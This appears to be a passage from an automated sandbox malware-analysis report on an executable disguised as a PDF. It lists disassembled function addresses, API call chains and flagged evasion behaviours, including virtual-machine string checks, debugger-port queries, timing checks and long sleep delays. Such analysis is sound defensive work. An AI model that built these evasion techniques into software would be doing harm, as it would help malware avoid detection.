                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0E94F push edi; ret 0_2_00B0E951
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0EA68 push esi; ret 0_2_00B0EA6A
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B08B85 push ecx; ret 0_2_00B08B98
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0EC43 push esi; ret 0_2_00B0EC45
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0ED2C push edi; ret 0_2_00B0ED2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004180D3 pushfd ; ret 1_2_004180F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B0BC push ds; retf 1_2_0040B0BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402146 push 00000048h; retf 1_2_0040212C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402155 push 00000048h; retf 1_2_0040212C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040210D push 00000048h; retf 1_2_0040212C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00419364 push ebp; iretd 1_2_00419366
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041454E push cs; retf 1_2_0041454F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AD0C push edx; iretd 1_2_0040AD0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403520 push eax; ret 1_2_00403522
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411DBB push ss; retf 1_2_00411EBC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411EAE push ss; retf 1_2_00411EBC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360225F pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036027FA pushad ; ret 1_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD push ecx; mov dword ptr [esp], ecx1_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360283D push eax; iretd 1_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360135F push eax; iretd 1_2_03601369
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038D225F pushad ; ret 3_2_038D27F9
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038D27FA pushad ; ret 3_2_038D27F9
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_039009AD push ecx; mov dword ptr [esp], ecx3_2_039009B6
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_038D283D push eax; iretd 3_2_038D2858
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F824A1 push ss; iretd 3_2_02F824A2
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F84A70 pushfd ; ret 3_2_02F84BCD
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F84B73 pushfd ; ret 3_2_02F84BCD
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F7E898 push ss; retf 3_2_02F7E999
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F7E98B push ss; retf 3_2_02F7E999
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00AE4A35
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B655FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B655FD
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B033C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B033C7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeAPI/Special instruction interceptor: Address: 1C531F4
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\recover.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\recover.exeWindow / User API: threadDelayed 3023Jump to behavior
                Source: C:\Windows\SysWOW64\recover.exeWindow / User API: threadDelayed 6949Jump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-99152
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\recover.exeAPI coverage: 2.9 %
                Source: C:\Windows\SysWOW64\recover.exe TID: 1196Thread sleep count: 3023 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\recover.exe TID: 1196Thread sleep time: -6046000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\recover.exe TID: 1196Thread sleep count: 6949 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\recover.exe TID: 1196Thread sleep time: -13898000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe TID: 5304Thread sleep time: -105000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe TID: 5304Thread sleep time: -43500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B44696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B44696
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B4C9C7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4C93C FindFirstFileW,FindClose,0_2_00B4C93C
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4F200
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B4F35D
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4F65E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B43A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B43A2B
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B43D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B43D4E
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B4BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4BF27
                Source: C:\Windows\SysWOW64\recover.exeCode function: 3_2_02F8C5C0 FindFirstFileW,FindNextFileW,FindClose,3_2_02F8C5C0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AE4AFE
                Source: recover.exe, 00000003.00000002.4207941820.000000000835E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
                Source: oCCZhsVsNwIIN.exe, 00000007.00000002.4204619311.0000000000920000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                Source: recover.exe, 00000003.00000002.4204255129.00000000032C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: recover.exe, 00000003.00000002.4207941820.000000000835E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: SC_TR11670000_pdf.exe, 00000000.00000003.1751687828.00000000010D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                Source: firefox.exe, 00000008.00000002.2221360071.0000028BE4CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll__
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-98508
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-98079
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\recover.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E rdtsc 1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417A33 LdrLoadDll,1_2_00417A33
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B541FD BlockInput,0_2_00B541FD
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00AE3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE3B4C
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B15CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B15CCC
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B5C304 LoadLibraryA,GetProcAddress,0_2_00B5C304
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_01C534C0 mov eax, dword ptr fs:[00000030h]0_2_01C534C0
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_01C53460 mov eax, dword ptr fs:[00000030h]0_2_01C53460
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_01C51E70 mov eax, dword ptr fs:[00000030h]0_2_01C51E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D437C mov eax, dword ptr fs:[00000030h]1_2_036D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B2349 mov eax, dword ptr fs:[00000030h]1_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]1_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]1_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]1_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]1_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]1_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]1_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]1_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]1_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]1_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]1_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]1_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]1_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]1_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]1_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]1_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]1_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]1_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]1_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]1_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]1_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]1_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]1_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]1_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]1_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
